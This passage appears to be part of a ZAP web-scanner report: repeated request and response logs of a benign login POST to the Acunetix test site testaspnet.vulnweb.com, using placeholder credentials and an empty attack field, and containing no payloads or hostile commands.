href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	btnLogin
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	btnLogin
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: 